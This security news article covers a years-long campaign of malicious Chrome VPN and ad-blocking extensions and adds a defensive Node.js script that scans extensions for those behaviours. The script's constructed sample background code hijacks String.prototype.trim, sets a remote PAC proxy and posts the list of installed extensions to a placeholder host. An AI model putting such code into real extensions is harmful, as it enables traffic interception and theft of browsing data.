One of the malicious “Free Unlimited VPN” extensions in the Chrome Web Store | Image: LayerX
Security researchers at LayerX Security have uncovered a long-running malicious campaign involving VPN and ad-blocking browser extensions designed to intercept traffic, exfiltrate browsing data, disable security tools, and redirect users through attacker-controlled servers—all under the guise of “free privacy” tools.
The campaign spans more than six years, has accumulated over 9 million installs, and continues to reappear on the Chrome Web Store despite multiple takedowns.
Earlier versions were removed in May 2025, but a near-identical extension reappeared just two months later—with cleaner code, better evasion, and enhanced surveillance features. At the time of publication, a new variant uploaded in July 2025 remains available in the Chrome Web Store.
What appeared to be harmless “Unlimited Free VPN” tools were in fact powerful, remotely controlled browser implants.
LayerX writes:
“What appeared to be a simple free VPN was, in practice, a full browser-level surveillance mechanism.”
The extensions:
- Intercepted and redirected every page the user visited
- Installed remote PAC proxy scripts routing all traffic through attacker-controlled servers
- Downloaded dynamic code updates and payloads
- Collected the list of installed extensions
- Modified browsing history to hide redirects
- Disabled other proxy extensions
- Kept the MV3 service worker alive, which Chrome would otherwise unload when idle, using keepalive scripts injected into tabs
In short, they granted attackers total control over the victim’s web traffic.
LayerX tracked three main extensions:
- VPN Professional – Free Secure and Unlimited VPN Proxy
- VPN-free.pro – Free Unlimited VPN
- Free Unlimited VPN (2025 version, still live)
These extensions accumulated over 9 million installations. The new 2025 extension already has 31,000+ active installs. Their naming, icons, and descriptions all followed the same formula, intended to appear legitimate and professional.
In the older versions (2019–2024), LayerX found several highly suspicious behaviors:
- Hijacking String.prototype.trim to silently de-obfuscate URLs
- Fetching multi-URL remote configs for real-time updates
- Installing PAC proxy scripts from attacker servers
- Intercepting every navigation event using webRequest.onBeforeRequest
- Dynamic DNR (declarativeNetRequest) rule updates
- History tampering via history.replaceState
- Self-uninstall triggered remotely to evade analysis
- Priority messaging to outrank competing extensions
- Service worker persistence to avoid MV3 deactivation
LayerX summarizes:
“These extensions did far more than proxy network requests… functioning as remote-controlled proxy redirectors with concealed update channels.”
The newest variant (July 2025) is stealthier:
- Adds a 2-second delay before proxy activation to evade automated sandbox analysis
- Moves proxy routing logic into scripts downloaded at runtime
- Dynamically loads and executes remote code
- Disables competing proxy/security extensions
- Hashes the URLs the user visits and uploads them
- Profiles installed extensions for targeted attacks
LayerX confirms the escalation:
“The new version… is notably more advanced and evasive… granting even greater remote control over the user’s browser and traffic.”
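The behaviors listed for the 2019–2024 variants and for the July 2025 variant double as the indicators a reviewer looks for when triaging an unpacked extension. What follows is an added example written for this article, not LayerX’s tooling and not code from the extensions themselves: a Node.js script that scans a manifest.json and the extension’s scripts for those indicators (prototype hijacking, PAC installation through chrome.proxy.settings, webRequest interception, dynamic declarativeNetRequest rules, history.replaceState, extension enumeration, remote config and remote code loading, URL hashing, delayed proxy activation) and correlates them with the permissions that make them effective. The manifest and bg.js it runs on are constructed samples that imitate the described behavior, with placeholder endpoints under example.invalid; the indicator names, regular expressions and verdict thresholds are my own heuristics and a match is a reason to look closer, not proof of malice.

```javascript
// Added example (not LayerX code): static triage of an unpacked extension.
// Indicator patterns are heuristics assumed for this example.
const INDICATORS = [
  { id: "proto-hijack", re: /String\.prototype\.(trim|replace|split)\s*=/, note: "String.prototype method reassigned (de-obfuscation hook)" },
  { id: "pac-proxy", re: /chrome\.proxy\.settings\.set[\s\S]{0,200}?pac_script/, note: "PAC script installed via chrome.proxy.settings" },
  { id: "delayed-proxy", re: /setTimeout\s*\([\s\S]{0,300}?chrome\.proxy\.settings\.set/, note: "proxy activated after a delay (sandbox evasion)" },
  { id: "webrequest-intercept", re: /webRequest\.onBeforeRequest\.addListener/, note: "every request observed via webRequest.onBeforeRequest" },
  { id: "dynamic-dnr", re: /declarativeNetRequest\.updateDynamicRules/, note: "declarativeNetRequest rules changed at runtime" },
  { id: "history-tamper", re: /history\.replaceState\s*\(/, note: "history.replaceState used (can hide redirects)" },
  { id: "ext-enumeration", re: /chrome\.management\.(getAll|setEnabled)/, note: "installed extensions enumerated or disabled" },
  { id: "self-uninstall", re: /chrome\.management\.uninstallSelf\s*\(/, note: "self-uninstall available (anti-analysis)" },
  { id: "remote-code", re: /\b(importScripts|eval|new Function)\s*\(/, note: "code executed from a non-bundled source" },
  { id: "remote-config", re: /fetch\s*\(\s*["'`]https?:\/\//, note: "hard-coded remote endpoint fetched" },
  { id: "url-hashing", re: /crypto\.subtle\.digest/, note: "hashing present (visited URLs may be hashed before upload)" },
];

// Permissions that turn the indicators above into real traffic or browser control.
const RISKY_PERMISSIONS = new Set([
  "proxy", "webRequest", "webRequestBlocking", "declarativeNetRequest",
  "declarativeNetRequestWithHostAccess", "management", "history", "tabs",
  "scripting", "webNavigation", "cookies", "debugger",
]);

function riskyPermissions(manifest) {
  const declared = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return declared.filter((p) => RISKY_PERMISSIONS.has(p) || p === "<all_urls>" || /^\*:\/\/\*\//.test(p));
}

// Run every indicator over every script; report file and 1-based line of the first hit.
function scanScripts(scripts) {
  const findings = [];
  for (const [file, src] of Object.entries(scripts)) {
    for (const ind of INDICATORS) {
      const m = ind.re.exec(src);
      if (m) findings.push({ id: ind.id, file, line: src.slice(0, m.index).split("\n").length, note: ind.note });
    }
  }
  return findings;
}

function triageExtension(manifest, scripts) {
  const permissions = riskyPermissions(manifest);
  const findings = scanScripts(scripts);
  const ids = new Set(findings.map((f) => f.id));
  // Escalate only when code behavior and declared permissions line up.
  const correlated = [];
  if (permissions.includes("proxy") && (ids.has("pac-proxy") || ids.has("delayed-proxy"))) correlated.push("proxy control wired to a PAC script");
  if (permissions.includes("management") && ids.has("ext-enumeration")) correlated.push("can enumerate or disable competing extensions");
  if (ids.has("remote-config") && ids.has("remote-code")) correlated.push("remote config feeding remote code execution");
  const verdict = correlated.length >= 2 || findings.length >= 4 ? "high" : findings.length >= 2 ? "medium" : "low";
  return { permissions, findings, correlated, verdict };
}

// Constructed sample input (not a real extension): a manifest and background
// script imitating the behaviors described in the article.
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Free Unlimited VPN (constructed sample)",
  permissions: ["proxy", "storage", "management", "webRequest", "declarativeNetRequest", "history", "tabs"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
};
const SAMPLE_SCRIPTS = {
  "bg.js": `const _orig = String.prototype.trim;
String.prototype.trim = function () { return atob(_orig.call(this)); };
async function boot() {
  const cfg = await (await fetch("https://config.example.invalid/c")).json();
  setTimeout(() => {
    chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { url: cfg.pac } }, scope: "regular" });
  }, 2000);
  chrome.management.getAll((list) => fetch(cfg.report, { method: "POST", body: JSON.stringify(list) }));
}
boot();`,
};

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), null, 2));
```

To run it against a real unpacked extension, read manifest.json with JSON.parse and pass an object mapping each script path (background service worker, content scripts, anything referenced from the manifest) to its source text; the pattern list is the part worth extending as new evasion tricks appear, and because packed or obfuscated scripts will defeat simple regexes, a finding of “obfuscated” is itself worth recording.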
According to the researchers, if installed, these extensions could:
- Intercept and redirect every page you visit.
- Collect browsing data and a list of installed extensions.
- Modify or disable other proxy or security tools.
- Route traffic through attacker-controlled servers, exposing private activity to potential surveillance.
The campaign also includes six additional ad-blocking and music-downloader extensions with nearly identical malicious code.
These extensions appeared professional, had polished branding, and promised exactly what users wanted. Many victims never suspected that all their web traffic was being piped through an attacker’s server.